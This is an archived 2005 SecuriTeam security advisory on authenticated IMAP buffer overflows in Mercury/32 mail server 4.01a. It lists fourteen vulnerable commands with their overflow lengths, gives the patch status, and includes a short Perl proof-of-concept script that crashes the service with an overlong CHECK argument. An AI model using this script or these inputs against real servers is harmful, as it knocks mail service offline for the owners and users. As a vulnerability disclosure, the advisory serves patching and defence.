[NEWS] Mercury Mail Multiple Buffer Overflows
From: SecuriTeam (support_at_securiteam.com)
Date: 09/13/05
- Previous message: SecuriTeam: "[NT] Windows XP Firewall Bypassing (Registry Based)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 13 Sep 2005 16:12:21 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Mercury Mail Multiple Buffer Overflows
------------------------------------------------------------------------
SUMMARY
<http://www.pmail.com/> Mercury is "a free, standards-based mail server
solution, providing comprehensive, fast server support for all major
Internet e-mail protocols. It is supplied in two versions, one hosted on
Windows systems, the other running as a set of NLMs on Novell NetWare file
servers".
An authenticated user can trigger several buffer overflows and possibly
run arbitrary code on the Mercury Mail server.
DETAILS
Vulnerable Systems:
* Mercury/32 version 4.01a
Immune Systems:
* Mercury/32 version 4.01b and later
There are 14 vulnerable commands that can be used to cause buffer
overflows to occur. After a successful login to the mail server, if any of
these commands are used with an overly long argument the application
closes resulting in a denial of service.
The commands and approximate argument lengths are as follows:
EXAMINE A x 512 \r\n
SUBSCRIBE A x 512 \r\n
STATUS A x 512 \r\n
APPEND A x 512 \r\n
CHECK A x 512 \r\n
CLOSE A x 512 \r\n
EXPUNGE A x 512 \r\n
FETCH A x 512 \r\n
RENAME A x 768 \r\n
DELETE A x 768 \r\n
LIST A x 768 \r\n
SEARCH A x 768 \r\n
CREATE A x 1024 \r\n
UNSUBSCRIBE A x 1024 \r\n
Vendor Status:
The vendor was notified an patch was released to solve the issues. For
more details visit the patches page at:
<http://www.pmail.com/patches.htm> http://www.pmail.com/patches.htm
Exploit Code:
#===== Start Mercury32_Overflow.pl =====
#
# Usage: Mercury32_Overflow.pl <ip> <imap4 user> <imap4 pass>
# Mercury32_Overflow.pl 127.0.0.1 hello moto
#
# Mercury/32, v4.01a, Dec 8 2003
#
# Download:
# http://www.pmail.com/
#
###########################
use IO::Socket;
use strict;
my($socket) = "";
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
print "Attempting to kill Mercury/32 service at $ARGV[0]:143...";
sleep(1);
print $socket "0000 LOGIN $ARGV[1] $ARGV[2]\r\n";
sleep(1);
print $socket "0001 CHECK " . "A" x 512 . "\r\n";
close($socket);
sleep(1);
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "143",
Proto => "TCP"))
{
close($socket);
print "failed!\n";
}
else
{
print "successful!\n";
}
}
else
{
print "Cannot connect to $ARGV[0]:143\n";
}
#===== End Mercury32_Overflow.pl =====
ADDITIONAL INFORMATION
The information has been provided by <mailto:reedarvin@gmail.com> Reed
Arvin.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] Windows XP Firewall Bypassing (Registry Based)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [EXPL] RevilloC Mail Server USER Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... RevilloC Mail Server USER Buffer
Overflow ... collect all the emails for your home or office network, ... (Securiteam) - [NT] MailEnable SMTPd DoS (Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... A bug in the SMTP protocol implementation
of MailEnable's mail server ... * MailEnable SMTPd Professional versions 1.54 and
prior ... The following EHLO request will cause the server to stop responding: ...
(Securiteam) - [UNIX] AsteriDex Code Execution (Asterisk and Trixbox)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... AsteriDex Code Execution (Asterisk
and Trixbox) ... of arbitrary operating system commands as the 'asterisk' user. ...
Originate' command which is used to ... (Securiteam) - [NEWS] Barracuda Spam Firewall Administrator Level Command Execution
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... interface allows execution of
commands by unauthenticated users. ... through the web interface using a path sanitation
... It was then possible to leverage further privileges, ... (Securiteam) - [NEWS] Terminal 5250 Remote Command Execution
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... Telnet based terminal emulation
programs, ... user to unwillingly execute arbitrary commands. ... All PC based
terminal emulation support a couple of legacy commands called ... (Securiteam)
